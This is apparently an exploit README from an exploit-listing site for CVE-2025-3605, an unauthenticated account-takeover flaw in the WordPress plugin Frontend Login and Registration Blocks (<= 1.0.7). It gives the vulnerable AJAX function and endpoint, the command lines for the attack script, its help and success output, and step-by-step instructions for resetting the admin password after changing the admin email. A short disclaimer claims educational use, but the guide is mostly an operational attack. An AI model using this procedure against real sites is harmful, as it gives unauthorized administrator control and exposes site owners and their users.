## https://sploitus.com/exploit?id=62F98837-7F50-5EC8-930D-B38C7CE84FD1
# ๐ CVE-2025-3605 Exploit Guide
### ๐ก๏ธ Vulnerability Summary
The **Frontend Login and Registration Blocks** plugin for WordPress (versions <= 1.0.7) is vulnerable to **privilege escalation via account takeover**.
The issue arises because the plugin does **not validate user identity** when updating sensitive details like email through the `flr_blocks_user_settings_handle_ajax_callback()` function.
โ **Impact:**
An unauthenticated attacker can change the administrator's email, trigger the "Forgot Password" process, and reset the admin password, gaining full control.
---
### ๐ฅ Proof of Concept (PoC)
The included Python script automates the exploitation process by targeting the vulnerable AJAX endpoint:
```
/wp-admin/admin-ajax.php
```
It updates the email of the targeted user (typically user_id `1` for admin) to an attacker-controlled email.
---
### ๐ฆ Included Script
**Filename:** `CVE-2025-3605.py`
```
python CVE-2025-3605.py --url http://target-site/wordpress --user_id 1 --mail attacker@example.com
```
โ **Default values:**
- `--user_id`: 1 (default admin)
- `--mail`: gadalubau1337@gmail.com
---
### ๐ฅ๏ธ Usage & Help
To see the help menu, run:
```
python CVE-2025-3605.py --help
```
Output:
```
[+] Starting exploit script...
usage: a.py [-h] --url URL [--user_id USER_ID] [--mail MAIL]
Frontend Login and Registration Blocks Plugin <= 1.0.7 is vulnerable to Privilege Escalation # By GadaLuBau (GadaLuBau1337)
options:
-h, --help show this help message and exit
--url, -u URL Target URL, e.g., http://192.168.100.74:888/wordpress
--user_id, -id USER_ID
User ID to target (default: 1)
--mail, -mail MAIL Email to set (default: gadalubau1337@gmail.com)
```
โ Example Run:
```
python CVE-2025-3605.py -u http://192.168.100.74:888/wordpress -id 1 -mail attacker@example.com
```
---
### ๐ฏ Expected Output
โ On success:
```
[+] Starting exploit script...
[+] Sending exploit to http:/target.com/wp-admin/admin-ajax.php/wp-admin/admin-ajax.php
[+] Exploit successful! Response: {"status":true,"message":"Operation has been completed successfully."}
[+] Final Step: Go to the Forgot Password page and reset the admin password using the new email!
Exploit By : GadaLuBau ( GadaLuBau1337 )
```
โ On failure:
```
[!] Exploit failed. HTTP Status: 400
[!] Response: 0
```
---
### ๐ After Exploitation
1๏ธโฃ Navigate to:
```
http://target-site/wordpress/wp-login.php
```
2๏ธโฃ Enter the **new email** you set (`attacker@example.com`).
3๏ธโฃ Request a password reset.
4๏ธโฃ Set a new password.
5๏ธโฃ Login as **administrator** and enjoy full access.
---
### โ ๏ธ Disclaimer
This exploit and script are provided **for educational and authorized testing purposes only**.
Any unauthorized use against systems you do not own or have explicit permission to test is illegal and unethical.
---
*By: GadaLuBau (GadaLuBau1337)*